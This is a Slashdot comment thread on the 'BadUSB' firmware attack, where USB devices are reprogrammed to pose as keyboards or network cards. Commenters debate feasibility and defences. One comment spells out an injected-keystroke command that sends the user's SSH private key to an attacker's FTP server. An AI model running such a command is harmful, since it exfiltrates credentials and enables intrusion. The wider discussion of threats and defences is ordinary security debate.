"BadUSB" Exploit Makes Devices Turn "Evil" 205
An anonymous reader writes with a snippet from Ars Technica that should make you (even more) skeptical about plugging in random USB drives, or allowing persons unknown physical access to your computer's USB ports: When creators of the state-sponsored Stuxnet worm used a USB stick to infect air-gapped computers inside Iran's heavily fortified Natanz nuclear facility, trust in the ubiquitous storage medium suffered a devastating blow. Now, white-hat hackers have devised a feat even more seminal—an exploit that transforms keyboards, Web cams, and other types of USB-connected devices into highly programmable attack platforms that can't be detected by today's defenses. Dubbed BadUSB, the hack reprograms embedded firmware to give USB devices new, covert capabilities. In a demonstration scheduled at next week's Black Hat security conference in Las Vegas, a USB drive, for instance, will take on the ability to act as a keyboard that surreptitiously types malicious commands into attached computers. A different drive will similarly be reprogrammed to act as a network card that causes connected computers to connect to malicious sites impersonating Google, Facebook or other trusted destinations. The presenters will demonstrate similar hacks that work against Android phones when attached to targeted computers. They say their technique will work on Web cams, keyboards, and most other types of USB-enabled devices.
USB 4.x to offer signed USB device signatures??? (Score:5, Interesting)
Here comes the digitially signed / encrypted usb dongles for USB 4.x, where every device has a firmware signature encrypted within the device and part of the usb handshake will be to read the entire firmware to re-calc the signature to make sure it matches, with a 3rd comparison via the internet to a usb device registry.
Then the criminals will figure out how to falsify the signature with the bad firmware anyway.
Re: (Score:2)
...with a 3rd comparison via the internet to a usb device registry.
That makes the whole concept dead on arrival. Anything that requires a connection is no damn good, aside from a remote terminal, I suppose
Re: (Score:2)
All you need to do is have the USB drive mounted by a locked down device. Example, RasPi set to read only on the OS and disable everything all it does is mounts the USB drive and then offers up the contents via the network.
I dont care what you have in the USB stick it will not auto run and infect. then your can look at the contents with another pc via the network and see the real contents or even run automated tests on it before it is available to the users machine.
It is not hard to make something that w
Re: (Score:2, Informative)
Re: (Score:2)
What they are talking about here infects on firmware/driver level initialization between USB device and computer when plugged in that is an inherent part of the USB standard, before and invisible to any user mode (software) inspection (and how do you plan to see/test that the usb firmware is not infected?).
Actually, this sounds like an interesting job for a Pi. I just checked the latest raspbian on my Pi and USB is compiled into the kernel (no USB modules, at least nothing obviously so). Recompile the kernel so USB is all loadable modules, then modify the base USB code to report transactions.
Plug your USB stick or disk or keyboard into the Pi, and if it reports that there's a new not-a-USB-stick/disk/keyboard, you know there's malware on the device.
On a different note, does anyone know of any modified fir
Re: (Score:2)
That makes the whole concept dead on arrival. Anything that requires a connection is no damn good, aside from a remote terminal, I suppose
How else do you plan to distribute a CRL? The firmware can get programmed with the updated certificate store when you have access to the CRL, but it can operate fine offline without it (accepting the enhanced risk).
Re: (Score:3, Insightful)
Wouldn't it be much simpler to make USB device firmware not upgradeable? When have you ever updated the firmware on a mouse or keyboard? If there's a legitmate need to leave them upgradeable, put in a jumper or switch that is off by default.
Re: (Score:2)
Then the hacker simply swaps the hardware for updatable hardware.
Re: (Score:3)
Re: (Score:2)
Hell yeah you have a bigger problem! I hope you have a hiding place for your Mountain Dew and your Doritos!
Re: (Score:3)
Re: (Score:3)
...except that plenty of people, even those who should know better, are willing to accept a free flash drive.
And that flash drive also is a HID device, and it's going to sometimes send a series of keystrokes that issue command you don't like.
This entire hack depends on a device that looks like a keyboard, not being a keyboard, but being a keyboard AND a network card - or a flash drive that's ALSO a HID device - or a webcam that's also a BT receiver.
Re: (Score:2)
Well perhaps the OS should ask the user "I see you've just plugged in a USB device that claims to be both a keyboard and a network adapter. Do you want to give this device both keyboard I/O and network access to your PC?"...
Basically, the same way that when you install an app on a mobile phone, the system prompts you for what capabilities you want to grant the app, your PC OS could do something similar for USB devices.
Re: (Score:2)
And if it's your first keyboard, how do you answer? Scream "YES" at it, or plug in the compromised mouse?
Even if you just allow HID devices without confirmation, compromised HID devices that click "yes" for you will be next.
Re: (Score:2)
And if it's your first keyboard, how do you answer? Scream "YES" at it, or plug in the compromised mouse?
I've lost track of the times I've had a BIOS report: "Keyboard failure. No keyboard detected. Press F1 to continue...". So no, you don't have to scream at it or plug in a mouse, just press F1. Do'h!
Re: (Score:2)
I've lost track of the times I've had a BIOS report: "Keyboard failure. No keyboard detected. Press F1 to continue..."
At which point you plug in a working keyboard and press F1.
Re: (Score:2)
At which point you plug in a working keyboard and press F1.
No, at which point you plug in a keyboard, reboot, press DEL or Fwhatever (2?) to go into the BIOS setup, fix the stupid "stop on keyboard error" or similar setting, save and exit, and then pull the keyboard back off.
I develop embedded/standalone systems that won't have a keyboard on them. I usually remember to set the BIOS as one of the first things on any new system, but many times I've gotten the "press F1" instruction when I get to final testing in target configuration.
But mostly I would say ... "who
Re: (Score:2)
Keyboards plugged in during Windows Installation will be exempt.
The fake HID keyboard can type YES all day, but since the driver software for the fake HID keyboard WON'T be loaded until the user types YES on an existing keyboard we would be OK.
This type of attack could be defeated if Windows had a security setting that forced all devices to have a properly signed INF package available before Windows will install any drivers for it. That INF (and signed cataloge file, and possibly driver files) can either be
Re: (Score:2)
And just a note, Windows does have some control, google "Managing Hardware Restrictions via Group Policy".
Re: (Score:2)
Re: (Score:2)
There are much worse threats. Thunderbolt and Firewire give the device full access to RAM, with no protection at all. For over a decade companies have been making Firewire and now Thunderbolt devices that dump a running PC's memory for forensic analysis, complete with any encryption keys and passwords that happen to be there. Law enforcement loves them because even if the computer is locked or the user logged out when they get there most operating systems auto-configure newly plugged in devices. Thunderbolt
and this is news why? (Score:2, Insightful)
I thought it was common sense not to plug in untrusted devices to your computer. Especially unknown thumb drives, unless you can use them in a read only device.
Re: (Score:3)
and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.
Re:and this is news why? (Score:4, Informative)
and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.
Let them try reprogramming a Model M keyboard. There is one perk to legacy PS/2 ports, they are secure!
Re: (Score:2)
And if the hackers are inside your house, you simply attack them with the Model M as a weapon.
Re: (Score:3)
The best security in this case is if there were no PS/2 keyboard connected before, then it won't be recognised until the computer is shut down or rebooted.
If you use a Model M, you will probably even fry the PS/2 port - but an "evil" Model M would have a replacement micro-controller that wouldn't fry the port by drawing too much current, like keyboard from the 90s and 00s don't.
Re:and this is news why? (Score:4, Informative)
The whole point of this is that the malware reprograms the firmware of existing, trusted devices to make them malicious.
Re: (Score:2, Informative)
As far as I can tell from the article it's not "malware reprograms", it's "malicious third party with physicall acess to USB device reprograms".
Quite a bit of difference.
Re:and this is news why? (Score:5, Insightful)
I would love to see malware that will reprogram a mask-programmed blob in a common throwaway hardware. Or a microcontroller in a webcam that doesn't even have the programming pins (typically some sort of ISP or JTAG) connected to anything USB accessible (or not even connected at all, at best to some test pads).
A typical USB stick or a webcam don't have hardware to permit firmware upgrades, even though the silicon inside could be theoretically upgradable. Not to mention that the exploit would have to be written specifically for the target hardware - different processors, memory layout, USB interface, etc - all that would make it really hard to produce a generic malware. If you want to see what is involved in something like that, look at the article on hacking HDD controllers:
http://spritesmods.com/?art=hd... [spritesmods.com] And that is a harddrive, which are produced by only few manufacturers, have relatively standardized interfaces and controllers. Now imagine having to do that sort of reverse engineering on every type of harddrive in common use if you wanted to write a reasonably effective malware (e.g. a data stealing worm). It is much easier to exploit some Windows bug or use a phishing scam than this.
So yes, this is potentially a threat, but panicking over your USB sticks or webcams going rogue on you is vastly overblown. This could be an issue for a very targeted attack where the benefits of compromising e.g. a keyboard of a high value target will outweigh the effort required, but not really anything else. And that assumes that the keyboard is actually able to be updated! It would be probably simpler to just send an operative in and install e.g. a keylogger ...
Oh and they mention the "BadBios" story ... Nobody was ever able to confirm that apart from the original very confused researcher.
Reprogramming at the factory. (Score:2)
Okay, so, instead the blackhats break into the factory that is manufacturing the chips and modify the firmware that is being written to them. Now, every USB keyboard that the company manufactures looks to the computer as both a USB keyboard, and a USB network device.
I'm sure you remember those instances where malware was being pre-installed onto pre-formatted external drives, right?
Sure, there's a lot more to be done to turn that "Fake network device" into something that can trick the OS into treating it as
ftdi, Atmel are VERY common in devices. I did it. (Score:3)
I bet at least 20% of the USB devices use the same FTDI chip for USB functionality, and another 20% use Atmel AVR microcontrollers. If your malware patched or replaced the Atmel firmware, you could own a lot if systems.
It wouldn't even NEED to continue to work like the original device, so you could just replace the firmware with the Atmel firmware I wrote last night. The user plugs in their webcam or tries to turn it on. The webcam doesn't work anymore. The bad guy doesn't care, at that point he has alr
Re: (Score:2)
I just turned an ATtiny45 into a SNES gamepad USB controller [hobbyelektronik.org].
Re: (Score:3)
How uninformed you are!
https://forums.hak5.org/index.php?/topic/8630-collection-of-production-tools-for-usb-devices/ is a discussion of "production tools" for USB flash drives.
These tools are specific to the controller in the flashdrive (chipsbank, micov, etc) and allow you to do things like change what size the drive reports itself as, load files onto the thing
Re: (Score:2)
Re: (Score:2)
So what you're saying is, the malware looks like Kristanna Loken?
Re:and this is news why? (Score:5, Insightful)
I thought it was common sense not to plug in untrusted devices to your computer. Especially unknown thumb drives, unless you can use them in a read only device.
The problem at hand is that you can take a trustworthy device, plug it into an infected computer and then your trustworthy device becomes compromised and not easily detectably so, infecting your formerly clean PC. So far, no comments on mitigating procedures or OS specific circumstances. Most OSes will automatically load USB devices so in theory this could affect just about every OS whereby a compromised phone decides to become a keyboard and starts typing keystrokes and sending data to a 3rd party. Scary, at least in theory.
Re:and this is news why? (Score:4, Interesting)
Re: (Score:2)
Command+S results in Safari asking me where I want to save this webpage.
Re: (Score:2)
My understanding of this.. read only only mitigates part of this.
The simple part:
So, you plug something in. It gets an enumerate request. It replies back "Howdy, i'm a USB mass storage device (a.k.a hard drive)".. Ok cool, i mount you read only. But then the stick says "Oh BTW, im also a keyboard". This is where you get hosed. Read only, disabled autoplay, doesn't help you as much as you want.
The "keyboard" can then send keystrokes to your machine. There are probably some things you can do with this with
Leverage (Score:4, Informative)
Re: (Score:2)
Nah, Leverage is just an illegally de-classified documentary of a black ops crime fighting unit from the future, sent back to us by the rebels as a warning about what's coming next.
How is this viable as an attack medium? (Score:2)
From the article, it seems like this attack is done by hardware-modifying a USB stick so that the firmware can be changed. While I get that this is a major problem for organizations that have a bunch of computers that could potentially have one of these things inserted into them, for most people it doesn't seem like a problem. The most I can see happening with this is someone putting bad firmware onto a USB device and selling them on EBay or similar as a means of stealing people's data, but I think that wou
Re:How is this viable as an attack medium? (Score:5, Interesting)
Really? Because the worst I can imagine is the NSA or another spy agency getting a shipment of devices from the manufacturer so that when you get it delivered new and in the box it's already compromised. Your brand new shiny Dell or HP would be compromised from the factory.
Think I've not got enough layers of tinfoil? Google for "Cisco NSA routers".
At this point, if it can be exploited by these clowns, it will be.
Unless, of course, it's law enforcement who have done it.
Re: (Score:3)
That said...something like "cd ~/.ssh;ftp attack@myserver.hack;put id_rsa;exit" wouldn't nec
Re:How is this viable as an attack medium? (Score:4)
I've heard about a few cases (which is a fancy way of saying, "I once heard a third-hand story, but am too lazy to fact check myself at the moment") of attackers leaving thumb drives in parking lots outside the buildings of offices they wanted to hack, as if the drives had been dropped out there by accident after slipping out of a pocket. Employees of the company inevitably found the drives, some of them kept the drives for personal use, and some of those drives eventually got plugged into computers inside the office. With AutoPlay settings and the like, it used to be fairly trivial for malware to enter an office that way.
Which is to say, if you find a USB drive in your company's parking lot, toss it in the trash if you can't find the original owner.
Re: (Score:2)
I have heard of this first hand. Plug in a USB device to see who to return it to, and not long after, security (computer and otherwise) pay you a visit to personally demonstrate the computer security policies you were supposed to learn from the online video training.
Re: (Score:2)
Which is to say, if you find a USB drive in your company's parking lot, toss it in the trash if you can't find the original owner.
Or I can connect it to a Linux VM and see what that has to say about it...
Re:How is this viable as an attack medium? (Score:5, Interesting)
1. A ton of USB devices are actually implemented as general-purpose components with programmable firmware (attached to whatever support hardware, like a network card or a webcam, is necessary). So they're more common than you think.
2. Smartphones are an excellent reprogrammable USB device that lots of individuals have.
3. This is difficult enough to really engineer well that it is probably a bigger threat as a targeted attack against a big organization for now. Until someone does the engineering to make it easy to deploy widely. Then, it'll be a threat for everyone. Kind of like automated hacking of consumer-grade routers to modify the firmware to participate in an Internet-wide portscan. It's the Metasploit effect: it's not a big problem until someone makes it automated, then it is.
Re:How is this viable as an attack medium? (Score:5, Interesting)
Smartphones is the big problem. People think it is acceptable to just plug them in everywhere to "just charge them".
I can go to a train-station or another reasonable public spot. Look for a power outlet and plug in my "charging station" that turn a smartphone into a malicious device.
This will infect devices from a very diverse group that will travel around and connect their devices to whatever USB-port they can find.
Re: (Score:2)
There is a further step worth taking. by adding a resistor (depends on device), the cable can signal it is a dumb charger, allowing a greater current draw if available.
Oh think of the fun when drivers update firmware (Score:2, Troll)
Windows loves to install USB drivers for all sorts of things. A couple NSA letters later and MS is now sending NSA payloads. They do not even have to ever touch the hardware.
Sure this is the case with any hardware and MS but you would assume a secure facility would lock it down. But USB now you have the sneaker net issues.
Re: (Score:2)
A couple NSA letters later and MS is now sending NSA payloads.
Because they couldn't already do this with network-distributed software updates?
Re: (Score:2)
I'll repeat.
Sure this is the case with any hardware and MS but you would assume a secure facility would lock it down. But USB now you have the sneaker net issues.
Re: (Score:2)
What sneakernet issue? Be more clear. USB devices do not contain installable software, except for the obvious and well-known case of a mass-storage device happening to contain files that can be intentionally or inadvertently executed by the end user after the MSD is connected.
Re: (Score:2)
http://www.usb.org/developers/... [usb.org] has been around for a decade and a half. I'm sitting in front of a USB mouse that gets firmware updates. I've flashed USB keys with new firmware. USB devices can and do contain nonvolatile firmware not just flash drives and not just what is general accessed by the OS.
Simple (Score:3)
just ask the user whether they want that second keyboard, network card, or mouse attached. And a malicious DNS server is also not the thing that doesn't let me sleep at night -- https was designed for that.
Re:Simple (Score:5, Funny)
It leave a bit of a chicken and egg problem for normal users of systems without a keyboard built in.
Re: (Score:2)
Input this code I show you on screen with this virtual keyboard, and the OS filter everu other input event from that device that is not targeted to that keyboard, validate the input and accept or reject the device, annoying I know, but not impossible to protect
Re: (Score:2)
It's still chicken and egg. Even if you have a touchscreen, that screen is an input device too, you know.
Re: (Score:2)
I think he meant "physical keyboard" when he said "virtual keyboard." In other words, if you don't already have an input device connected that you've approved, if the new device is a keyboard, the OS displays a code for you to type on that keyboard in order to verify that it is a real keyboard and not a phony device in a flash drive, and ignores other input from that device until the code is typed correctly. Similarly, for a mouse you could display some buttons on the screen and ask the user to click them
Old attack (Score:5, Insightful)
This kind of attack is not new, the new part are the examples of generic devices with hacked firmware to do that. This can be solved easily requesting user autorization before activating any USB device type, for example, before telling the system that there is a new USB network device, ask the user for confirmation. The trick is with input devices, where the new device could be replacing a broken one (keyboard or mouse), the confirmation can be done requesting the user to type a code displayed on screen or using the mouse to use a on screen keyboard in order to accept the input device for general usage. The other problem is with devices permanently attached, assume that any attached device at boot time is trusted, If someone replaced your USB device when you weren't present other more awful things couls have been done.
Did it on Linux last night. Without warning ... (Score:2)
Last night I programmed a chip to act as a USB keyboard and automatically "press" keys. The system did as you described, identifying it as a keyboard, and creating a node in /dev. Something like /dev/keyboard1. It then proceeded to accept the keyboard events exactly as though I'd typed them, without any confirmation by the user. Confirmation by the user would be problematic in the case of a broken keyboard or mouse - the system can't let you use the new keyboard to confirm itself.
I'm using it to brute fo
Re: (Score:2)
... you should be locked out by the 5th try at least.
Minimal Alert (Score:2)
While not a real solution at all, it should be easy for any OS to at least offer pop-up an approval when you plug in a USB device. E.g. "Do you want to connect this keyboard"? That would be a red flag if you didn't think it was a keyboard and give you a chance to deny it.
Maybe skip the warning for pure storage devices - but warn for anything else. It might be disconcerting to have a warning for "Connect this video camera" when you were plugging
Re: (Score:2)
USB device drivers are not of sufficient quality to make that mitigation very viable. Just exploit the broken drivers instead; on most operating systems device drivers have the equivalent of root privileges.
Re: (Score:2)
NOTICE: USB DEVICES CONNECTED
The following devices have been connected to USB bus 5:
Device 0, Device ID="0123:4567", Manufacturer="Harmless USB Devices, Inc", DeviceClass="Hub", DeviceProtocol="Full speed hub"
Device 1, Device ID="0123:4567", Manufacturer="Harmless USB Devices, Inc", InterfaceClass="Mass Storage", InterfaceProtocol="Bulk Only"
Device 2, Device ID="0000:0000", Manufacturer="What is this", InterfaceClass="Human Interface Device", InterfaceProtocol="Keyboard"
Device 3, Device ID="0000:0000
Safety first, kids... (Score:5, Funny)
Re: (Score:2)
Just another reason why you shouldn't stick foreign objects in your orifices...
www.bad-dragon.com is okay though.
Re:Safety first, kids... (Score:4, Funny)
Must .... not ... paste ... URL ... into ... browser
Gak, that's so wrong, you sick bastard. ;-)
Not just USB (Score:2)
Limited scope of vulnerability (Score:3)
Re: (Score:2)
just keep an eye on what device types are showing up in /sys/bus/usb or device manager.
I'll pass this on to my mother, thanks!
PS/2 (Score:2)
Re: (Score:2)
I always choose a motherboard with both ports. Can be very useful even if you start out with both peripherals as USB. e.g. when my USB mouse broke, I got the older PS/2 one from a drawer and it still works very fine. Likewise I broke a keyb from 2010 or 2011 and ultimately replaced it with one from 1996 (which has grease and a space bar that needs serviced but registers all keys)
Re: (Score:2)
Preemptive whooosh for the humour-impaired
How many have been bulk-mailed for Fortune 500s? (Score:4, Insightful)
If you had the money/resources, you could create these things by the thousand and bulk-mail these to major companies. It would stand to reason that somebody would end up plugging them into their office computer, enabling a back door.
You could go even further and create hacked 5 port switches or access points and ship them off to big company branch offices, where users may be more likely to ignore standards or be short on resources and use those kinds of things anyway. You could put a return label on it for the office supply company or even the HQ office so that users thought it was something they had gotten by accident.
I'd bet in a lot of cases people would just say "sweet" and go ahead and use them in the office, giving you a back door. A switch or access point would have enough space inside that custom hardware could be inserted giving a lot better back door, like having your own computer on their network.
The very first thing I do is disable autorun (Score:2)
Mainly because it's the first asking for access(Windows), I just no everything out. One of the largest security holes around and it's still fully active.
Give up complete computer security because I want music to play seconds before I could do it myself.
This is Linux's Version of Autorun (Score:2)
This is kind of a new version of auto-run, one implemented by all operating systems.
The problem with auto-run is that a CD might tell the computer to do anything, not just what the user would like it to do.
The same problem exists with keyboards. They'll likely just send the keystrokes you type to the computer, much like the vast majority of CDs will only tell your computer to run the game that they contain that you want to play. However, a few will do something else, and the computer will happily do whate
Do cellphone chargers require USB negotiation? (Score:2)
The most obvious route for disaster is a compromised cellphone charger, at least for my usage patterns. Since it'd take me about ten minutes to make a pez-candy-sized PCB with USB-micro-M and USB-micro-F connectors with only the power lines connected between them, I'm wondering if an android phone will charge when it's getting power, regardless of whether the USB is connected, or it won't charge until it's had a USB chat. I recall older devices being able to charge at lower-power (150mA?) but having to ne
Re: (Score:2)
You just need a resistor or two. Almost any USB-charged device will charge at 500 mA if it is connected to a dumb charger (no data lines), but in order to charge at a higher current (as many devices do), it needs to sense that it's connected to a charger that supports the higher current draw. So that it can be implemented without real USB-supporting electronics, that's just done with some simple electrical components. So you can make a charger that blocks the data lines but permits full-speed charging.
If yo
Re: (Score:2)
Awesome, thank you. Because I'm that kind of person I'll probably bodge one up on the pcb plotter today, with some available pads for adding resistors later.
Re: (Score:2)
Sure. Depending on your device (iPhone works differently from the standard USB fast-charging spec), you should be able to easily look up what resistors need to go where. (As mentioned, non-iPhone devices use an informal standardized spec. A circuit diagram of something like a Samsung charger should show you.)
Hyperbole (Score:2)
For example, my keyboard has exactly 256 Bytes of FLASH storage. And if you put malware in there (which it is too small for), it loses its keymap. So "most" is really "some, and in particular devices modified for this" here. In addition, this attack need to be customized for each specific device, which is expensive. And many devices are not even reprogrammable without circumventing MCU protection bits.
This is mostly a non-issue with regular devices.
Re: (Score:2)
The bad guys only have to win once.
Guardian data destruction explained (Score:2)
Possibly explains why the cesg guys got certain usn related chips destroyed on The Guardian kit that had held Snowdens files - perhaps they'd already done this and wanted the evidence removed
Re: (Score:3)
Re:Do I need to be concerned about this? (Score:4, Funny)
nah, it's an easy fix (Score:2)
sledgehammer the sumbuck into dust and buy a new computer. no problem.
Re: (Score:2, Interesting)
Yes, the "white-hat hackers" are Karsten Nohl and his gang. That's the guy behind the GSM hack. If he wants to know the algorithm that a smart card uses for encryption, he removes layer by layer of the chip and reconstructs the algorithm from the circuits. Nohl does not kid around. If he says it can be hacked, it can.
Re:Do I need to be concerned about this? (Score:4, Interesting)
Depends.
I once worked for a company that wrote web banking software. The laptops/desktops/etc of certain employees had a 'driver' that continually monitored the USB ports. If anything plugged into it that had storage on it but not the proper corporate auth key to connect as an approved storage device? It would automatically send an email to the IT department, immediately shut off the entire USB subsystem in the OS, and it stayed that way until the device was re-imaged (in many cases making the device completely useless). It also got you immediately perp-walked out of the building and freshly unemployed, unless you could immediately give them a reasonable (and provable) explanation as to why it happened.
Now in this case, I suspect that if the bad stick presented itself to the OS as a keyboard/mouse/whatever, it may circumvent that (I say "may" because I don't know if it would be able to dump any non-keyboard/mouse-related data onto the machine w/o presenting itself as storage.)
Either way, if you're that worried about it, then epoxy the USB ports shut (well, except on the phone for obvious reasons...)
Re: (Score:2)
You could even to do the same on a phone if it was able to charge wirelessly.
Re: (Score:3)
Re:Do I need to be concerned about this? (Score:5, Insightful)
* A bank?
* A utility?
* A large corporation?
* A defense contractor?
* A military?
* A government?
* A "whistlebower" (in the figurative sense, not someone who just blows a literal whistle)?
* A journalist?
* A civil rights/government abuse/environmental/economic activist?
* Are you a member of an "anti-government" group or movement?
* Are you Muslim?
* Are you or have you ever been brown?
* Now or will you in the future travel through a customs inspection area of any country?
* Under active investigation by a law enforcement agency?
* A rabble-rouser?
* A person with opinions that are counter to those of your government?
* A sentient artificial lifeform?
If you answered yes to any of the above, then yes you need to be worried. If you did not, then no, you probably don't need to be worried.
Re:Do I need to be concerned about this? (Score:4, Funny)
Negative, I am a meat popsicle.
Re: (Score:2)
It'd probably be easier to implement a little hardware device that places restrictions on device classes that can connect through it and limits hybrid devices (e.g., keyboard+mouse = ok, keyboard+webcam = reject).
Re: (Score:2)
Except the ones for your keyboard and mouse, right? Except your keyboard broke, so just plug in this new one you got from Dell via NSAUSPS.
Re: (Score:2)
Nah. Glue all of the USB ports up and only use safe, secure, wireless solutions like Bluetooth for your keyboard and mouse.
That should solve all of your security problems in a single stroke.
Re: (Score:2)
Doesn't sound like much of a leap (Score:2)
I was reading about more capable hacks back in 2005 back when there were people doing attacks against the generic device drivers for ... well, any type of USB device driver. Plus using it to pick up the keyboard or injecting data to mess with other devices on the bus.
TFA sounds to me like a much more limited attack and not all that creative since we've had a decade+ of USB devices that spoofed multiple devices -- I'm specifically thinking of those spoofed CD-ROM drives on some of those old Flash sticks.
Keyb
Re: (Score:2)
>2014
>not using a computer that has an IOMMU
ISHYGDDT.jpg